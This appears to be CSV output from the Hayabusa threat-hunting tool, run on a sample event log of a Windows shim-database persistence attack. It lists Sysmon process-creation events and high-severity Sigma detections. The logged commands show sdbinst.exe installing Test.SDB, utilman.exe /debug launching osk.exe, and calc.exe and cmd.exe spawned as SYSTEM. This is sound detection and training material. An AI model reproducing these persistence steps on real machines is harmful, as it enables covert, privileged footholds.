2019-03-20 05:41:13.151 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\VBoxService.exe : Path: C:\Windows\System32\VBoxService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:13.181 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:13.221 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:14.232 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k GPSvcGroup : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:14.603 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.094 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Startup : Path: C:\Windows\System32\gpscript.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" : Path: C:\Program Files\freeSSHd\FreeSSHDService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.865 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:16.065 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:16.436 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:16.626 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:17.026 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\UI0Detect.exe : Path: C:\Windows\System32\UI0Detect.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:22.404 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe SYSTEM : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:00.148 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""taskhost.exe"" : Path: C:\Windows\System32\taskhost.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:00.329 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:00.419 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\slui.exe"" : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:00.489 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:37.392 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logon : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:37.432 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:37.602 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:38.654 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:38.704 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\PSEXESVC.exe"" : Path: C:\Windows\PSEXESVC.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:38.774 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: msg * ""hello from run key"" : Path: C:\Windows\System32\msg.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:43:24.560 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" : Path: C:\Program Files\Windows Media Player\wmpnetwk.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:46:04.916 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:46:20.518 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" : Path: C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.559 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.860 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.920 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:36.644 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:27.967 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:27.988 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:31.212 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:44.972 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:44.982 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:45.152 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
